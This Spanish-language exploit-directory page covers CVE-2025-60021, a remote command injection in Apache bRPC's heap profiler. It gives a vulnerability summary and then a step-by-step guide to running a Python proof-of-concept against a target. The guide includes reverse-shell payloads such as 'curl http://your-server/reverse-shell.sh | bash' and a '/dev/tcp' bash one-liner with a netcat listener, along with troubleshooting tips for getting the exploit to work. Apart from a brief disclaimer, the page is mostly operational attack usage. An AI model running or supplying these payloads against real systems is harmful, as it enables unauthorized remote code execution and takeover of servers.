Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Ashwesker-CVE-2025-60021 — CVE-2025-60021 | Kitploit
Herramientas/GitHubGitHub/mefhika120/ashwesker-cve-2025-60021
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubmefhika120/ashwesker-cve-2025-60021

Ashwesker-CVE-2025-60021

CVE-2025-60021

Ver Repositorio
28hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛑 CVE-2025-60021 — Inyección de comandos remota en Apache bRPC

G_GmijOXQAAX5iE

📌 Resumen

CVE-2025-60021 es una vulnerabilidad crítica de inyección remota de comandos encontrada en el servicio integrado de perfilado de heap (heap profiler) (/pprof/heap) de Apache bRPC en versiones anteriores a la 1.15.0, que permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema operativo. ([NVD][1])


🔓 Detalles de la vulnerabilidad

AtributoInformación
Nombre / IDCVE-2025-60021
ProductoApache bRPC (todas las plataformas)
Versiones afectadas< 1.15.0
Fecha de publicación16 ene 2026 ([NVD][1])
Tipo de vulnerabilidadInyección remota de comandos (CWE-77) ([NVD][1])
Endpoint/pprof/heap
DisparadorParámetro extra_options sin sanitizar
Causa raízEntrada no validada antes de ejecutarse como comando del sistema operativo ([openwall.com][2])

❗Los atacantes pueden inyectar comandos de forma remota simplemente manipulando este parámetro de perfilado.


🚨 Gravedad y riesgo

🔥 Clasificación de gravedad: Crítica 📊 Puntuación base CVSS v3.1: 9.8 / 10 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ([INCIBE][3])

Categoría de impactoEfecto
ConfidencialidadAlta
IntegridadAlta
DisponibilidadAlta
Vector de ataqueRed
PrivilegiosNo se requieren
Interacción del usuarioNo se necesita([INCIBE][3])

👉 Esto significa que los atacantes pueden ejecutar comandos arbitrarios de forma remota sin iniciar sesión: el peor escenario para los servicios expuestos.


🧠 Desglose técnico

🔍 Cómo funciona

  1. Exposición del Heap Profiler: bRPC expone un endpoint de perfilado (/pprof/heap) destinado al análisis de memoria (jemalloc). ([openwall.com][2])
  2. Error en el manejo de entradas: El endpoint acepta un parámetro extra_options. En lugar de sanitizarlo, bRPC lo pasa directamente al shell del sistema operativo. ([openwall.com][2])
  3. Inyección de comandos: Un actor malicioso crea una entrada que incluye comandos del sistema → el servicio los ejecuta. ([CVE Details][4])

Guía paso a paso para usar el script PoC de CVE-2025-60021

Esto asume que tienes el script guardado como CVE-2025-60021.py (aunque el CVE real es 2025-60021; siéntete libre de renombrarlo). Es un script de Python 3 para demostrar la vulnerabilidad de inyección remota de comandos en el heap profiler de Apache bRPC. Ejecútalo únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas: explotar sin autorización es ilegal.

Requisitos previos

  1. Entorno de Python: Asegúrate de tener Python 3 instalado (p. ej., 3.6+). El script utiliza módulos integrados además de requests y argparse (que son estándar o fáciles de instalar).

  2. Instala las dependencias: Si aún no están presentes, instala la librería requests:

    pip install requests
    
  3. Configuración del objetivo: Necesitas un servidor Apache bRPC vulnerable:

    • Versión < 1.15.0.
    • Heap profiler habilitado (revisa la configuración del servidor; a menudo está activado por defecto en entornos de desarrollo).
    • Accesible a través de la red (p. ej., http://localhost:8060 o una IP/puerto remotos). Si pruebas localmente, configura una instancia vulnerable de bRPC (p. ej., mediante Docker o compilación desde el código fuente; consulta la documentación de Apache bRPC).
  4. Permisos: Ejecuta con sudo solo si es necesario para el acceso a la red o los privilegios; de lo contrario, basta con python3 normal.

Paso 1: Guarda el script

Copia el código PoC que proporcioné antes en un archivo llamado CVE-2025-60021.py. Hazlo ejecutable si lo deseas:

chmod +x CVE-2025-60021.py

Paso 2: Comprende los argumentos

El script acepta dos argumentos posicionales obligatorios:

  • target: La URL del servidor bRPC vulnerable (p. ej., http://192.168.1.100:8060 o http://targets:8060; corrige cualquier error tipográfico, como un esquema faltante o un host no válido).
  • cmd: El comando a ejecutar en el objetivo (p. ej., "id" para información del usuario, o algo más complejo como "curl http://your-server/reverse-shell.sh | bash" para una reverse shell). Usa && o ; para encadenar varios comandos.

Paso 3: Ejecuta el script

Abre una terminal (p. ej., en Kali Linux, ya que la estás usando) y ejecútalo con tu objetivo y comando. Ejemplos de comandos:

  • Prueba básica (obtener información del sistema):

    sudo python3 CVE-2025-60021.py http://targets:8060 "id && whoami && uname -a"
    
  • Ejemplo de reverse shell (reemplaza your-listener-ip y el puerto; configura un listener como nc -lvnp 4444 primero):

    sudo python3 CVE-2025-60021.py http://targets:8060 "bash -i >& /dev/tcp/your-listener-ip/4444 0>&1"
    
  • Si usas HTTPS o un puerto diferente, ajusta la URL en consecuencia (p. ej., https://target:443; el script lo maneja, pero añade --insecure si hay problemas de certificado).

Paso 4: Interpreta la salida

Indicadores de éxito:

  • ¡El exploit probablemente tuvo éxito! (200 OK)
  • Posible salida del comando en el cuerpo de la respuesta (p. ej., uid=0(root)... si ejecutó id).
  • Para comandos sin salida (p. ej., escritura de archivos o shells), revisa el servidor objetivo (registros, procesos) o tu listener.

Indicadores de fallo (como lo que viste):

  • ¿Recibiste el código de estado 404? ¿Quizás no es vulnerable?"
  • Mensajes de error como "[E1002] Heap profiler is not enabled" significan que el endpoint no está activo: habilítalo en el objetivo o busca una instancia vulnerable diferente.
  • Timeouts o errores de conexión: objetivo inalcanzable, firewall bloqueando o puerto incorrecto.
  • Si no se filtra ninguna salida, el comando igualmente se ejecuta silenciosamente en el servidor.

Paso 5: Solución de problemas comunes

  • Error 404: Heap profiler deshabilitado. Actívalo en la configuración de bRPC (p. ej., --enable_heap_profiler=true) y reinicia el servidor.
  • Error de argparse: Olvidaste el argumento cmd; inclúyelo siempre.
  • Sin salida en el cuerpo de la respuesta: Algunos comandos no producen salida estándar. Usa aquellos que sí la produzcan (p. ej., echo "test" > /tmp/proof.txt) y verifica el archivo en el objetivo.
  • Privilegios: Si el proceso de bRPC se ejecuta como no root, los comandos están limitados a los permisos de ese usuario.
  • Ajustes del payload: Si ; no funciona, prueba && o | para encadenar. Codifica en URL los caracteres especiales si es necesario (el script maneja la mayoría).
  • Pruebas locales: Levanta un contenedor Docker vulnerable de bRPC para verificar sin arriesgar sistemas reales.

Paso 6: Limpieza y notas éticas

Descargar herramienta